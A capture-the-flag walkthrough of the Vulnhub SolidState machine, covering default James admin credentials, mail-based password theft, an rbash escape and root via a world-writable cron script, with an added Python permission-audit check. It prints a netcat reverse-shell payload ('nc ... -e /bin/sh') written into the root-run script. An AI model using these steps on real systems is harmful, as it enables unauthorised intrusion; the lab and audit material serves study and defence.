Vulnhub — SolidState

Raj Singh
3 min read · Oct 15, 2019

Nmap

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.0.0.1 [10.0.0.1]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home — Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
MAC Address: 08:00:27:84:65:27 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2–4.9
Uptime guess: 198.839 days (since Sat Mar 30 21:17:42 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

The James Remote Admin service on port 4555 still accepts its default credentials.

We connect to it with netcat, log in as root/root, list the users and reset mindy's password:

nc 10.0.0.29 4555
# user = root, password = root
listusers
setpassword mindy mindy

Now we read mindy's mail from the POP3 service on port 110 (the nmap output above shows JAMES pop3d there):

telnet 10.0.0.29 110
USER mindy
PASS mindy
LIST
TOP 2 836 # and we got the password for mindy's ssh account

With mindy's ssh password in hand, let's connect with it.

We land in an rbash (restricted) shell that doesn't allow some commands, so we bypass it by asking ssh to run a plain shell instead:

ssh mindy@10.0.0.29 sh

Got the sh shell, and now we can read user.txt. Let's look for root privilege: running pspy32 to watch background processes, I saw /opt/tmp.py being executed as root every 3–4 minutes, and luckily tmp.py is world-writable.

So let's see how we can use this to get root: we simply overwrite tmp.py with echo.

echo "import os
os.system('nc 10.0.0.1 80 -e /bin/sh') " > /opt/tmp.py
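The condition that hands over root here is a script executed by root that any user can write to (or sit in a directory any user can write to). The check below is an added defensive example, not code from the original walkthrough: it audits a path that a privileged scheduler runs and reports the permission problems a hardening review should catch, then demonstrates on a constructed temporary file that 0644 clears the finding.

```python
"""Audit a script that cron or another root scheduler executes."""
import os
import stat
import tempfile
from pathlib import Path


def audit_privileged_script(path):
    """Return a list of findings; an empty list means the script looks safe to run as root."""
    findings = []
    p = Path(path).resolve()
    if not p.is_file():
        return [f"{p}: not a regular file"]

    st = p.stat()
    perm = stat.S_IMODE(st.st_mode)
    if perm & stat.S_IWOTH:
        findings.append(f"{p}: world-writable (mode {oct(perm)})")
    if perm & stat.S_IWGRP:
        findings.append(f"{p}: group-writable (gid {st.st_gid})")
    if st.st_uid != 0:
        findings.append(f"{p}: owned by uid {st.st_uid}, not root")

    # A world-writable parent directory without the sticky bit lets any user
    # replace the file outright, even when the file's own mode looks fine.
    for parent in p.parents:
        pperm = stat.S_IMODE(parent.stat().st_mode)
        if pperm & stat.S_IWOTH and not pperm & stat.S_ISVTX:
            findings.append(f"{parent}: world-writable directory without sticky bit")
    return findings


def demo():
    """Constructed fixture: a tmp.py with mode 0666 (the SolidState condition),
    then the same file at 0644 (the fix). Returns (findings_before, findings_after)."""
    d = tempfile.mkdtemp()
    script = os.path.join(d, "tmp.py")
    with open(script, "w") as f:
        f.write("import os\n")  # constructed placeholder content
    os.chmod(script, 0o666)
    before = audit_privileged_script(script)
    os.chmod(script, 0o644)  # only the owner may write
    after = audit_privileged_script(script)
    return before, after


if __name__ == "__main__":
    for line in demo()[0]:
        print(line)
```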

With tmp.py now holding our nc reverse shell, we start an nc listener on our own host and wait for the next scheduled run.

And BOOM 💣 we got a root shell and the root flag.

COWABUNGA